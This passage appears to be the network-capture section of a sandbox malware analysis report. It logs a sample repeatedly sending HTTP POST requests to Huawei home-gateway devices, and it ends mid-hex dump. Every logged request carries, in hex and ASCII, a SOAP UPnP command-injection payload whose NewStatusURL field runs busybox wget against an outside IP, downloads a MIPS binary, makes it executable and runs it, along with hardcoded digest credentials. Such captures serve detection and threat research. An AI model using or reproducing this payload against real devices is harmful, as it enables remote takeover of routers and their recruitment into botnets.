                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:31:27.719969034 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:31:42.309967041 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:32:11.489806890 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            35192.168.2.2349042156.241.74.11237215
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:13.367598057 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:31:15.337759018 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:31:17.737375021 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:31:22.600702047 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:31:32.071357012 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 